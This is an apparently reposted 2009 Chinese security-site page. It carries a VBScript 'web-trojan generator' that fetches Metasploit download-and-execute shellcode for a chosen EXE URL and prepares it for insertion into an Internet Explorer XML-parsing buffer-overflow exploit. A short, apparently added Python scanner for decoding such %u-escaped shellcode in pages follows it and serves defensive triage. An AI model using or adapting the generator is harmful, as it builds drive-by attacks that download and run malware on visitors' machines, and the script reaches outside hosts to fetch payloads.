
VBScript: web-trojan generator for MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day


Source: Internet   Compiled by: 软晨网 (RuanChen.com)   Published: 2009-10-12   Views: 218

Exploit code for MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day:
'code by lcx
On Error Resume Next
Exeurl = InputBox( "请输入exe的地址:", "输入", "http://www.haiyangtop.net/333.exe" )
url="http://www.metasploit.com:55555/PAYLOADS?parent=GLOB%280x25bfa38%29&MODULE=win32_downloadexec&MODE=GENERATE&OPT_URL="&URLEncoding(Exeurl)&"&MaxSize=&BadChars=0x00+&ENCODER=default&ACTION=Generate+Payload"

Body = getHTTPPage(url)
Set Re = New RegExp
Re.Pattern = "(\$shellcode \=[\s\S]+</div></pre>)"
Set Matches = Re.Execute(Body)
If Matches.Count>0 Then Body = Matches(0).value
code=Trim(Replace(Replace(replace(Replace(Replace(Replace(Replace(Body,"$shellcode =",""),Chr(34),""),Chr(13),""),";",""),"</div></pre>",""),Chr(10),""),".",""))
function replaceregex(str)
set regex=new regExp
regex.pattern="\\x(..)\\x(..)"
regex.IgnoreCase=true
regex.global=true
matches=regex.replace(str,"%u$2$1")
replaceregex=matches
end Function

Function getHTTPPage(Path)
t = GetBody(Path)
getHTTPPage = BytesToBstr(t, "GB2312")
End Function
Function GetBody(url)
On Error Resume Next
Set Retrieval = CreateObject("Microsoft.XMLHTTP")
With Retrieval
.Open "Get", url, False, "", ""
.Send
GetBody = .ResponseBody
End With
Set Retrieval = Nothing
End Function
Function BytesToBstr(Body, Cset)
Dim objstream
Set objstream = CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode = 3
objstream.Open
objstream.Write Body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
Set objstream = Nothing
End Function
Function URLEncoding(vstrIn)
strReturn = ""
For aaaa = 1 To Len(vstrIn)
ThisChr = Mid(vStrIn,aaaa,1)
If Abs(Asc(ThisChr)) < &HFF Then
strReturn = strReturn & ThisChr
Else
innerCode = Asc(ThisChr)
If innerCode < 0 Then
innerCode = innerCode + &H10000
End If
Hight8 = (innerCode And &HFF00)\ &HFF
Low8 = innerCode And &HFF
strReturn = strReturn & "%" & Hex(Hight8) & "%" & Hex(Low8)
End If
Next
URLEncoding = strReturn
End Function
set fso=CreateObject("scripting.filesystemobject")
set fileS=fso.opentextfile("a.txt",2,true)
fileS.writeline replaceregex(code)
'fileS.writeline body
wscript.echo replaceregex(code)
files.close
set fso=Nothing
wscript.echo Chr(13)&"ok,生成a.txt,请用a.txt里的替换http://milw0rm.com/sploits/2008-iesploit.tar.gz里的shellcode1内容即可"
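
For triage of pages produced with a generator like this one, the following added example (not part of the original script) reverses the `\xNN\xNN` to `%uXXXX` byte-pair swap performed by replaceregex, flags long runs of such escapes in page content, and pulls printable strings out of the decoded bytes. The threshold MIN_UNITS, the function names and the sample page are assumptions constructed for illustration.

```python
import re

# Assumption: 8 or more consecutive %uXXXX units is treated as suspicious;
# ordinary pages rarely carry more than a few escapes in a row.
MIN_UNITS = 8
RUN_RE = re.compile(r"(?:%u[0-9a-fA-F]{4}){" + str(MIN_UNITS) + r",}")
PRINTABLE_RE = re.compile(rb"[\x20-\x7e]{6,}")

# Constructed sample: four filler bytes followed by a harmless placeholder URL,
# stored the way the script above emits it, plus a benign two-unit escape.
SAMPLE_PAGE = (
    '<a href="?q=%u4e2d%u6587">link</a>\n'
    '<script>var s = unescape("%u0201%u0403%u7468%u7074%u2f3a%u652f%u6178'
    '%u706d%u656c%u692e%u766e%u6c61%u6469%u612f");</script>\n'
)


def decode_percent_u(run):
    """Turn '%uBBAA%uDDCC' back into the bytes AA BB CC DD."""
    out = bytearray()
    for unit in re.findall(r"%u([0-9a-fA-F]{4})", run):
        value = int(unit, 16)
        # Each unit is a little-endian 16-bit word: low byte first.
        out += bytes((value & 0xFF, value >> 8))
    return bytes(out)


def scan(text):
    """Return one finding per long %u run: offset, decoded size, strings."""
    findings = []
    for match in RUN_RE.finditer(text):
        raw = decode_percent_u(match.group(0))
        strings = [s.decode("ascii") for s in PRINTABLE_RE.findall(raw)]
        findings.append(
            {"offset": match.start(), "size": len(raw), "strings": strings}
        )
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_PAGE):
        print(finding)
```

Strings recovered this way, such as an embedded download URL, are candidate indicators for proxy and DNS log searches.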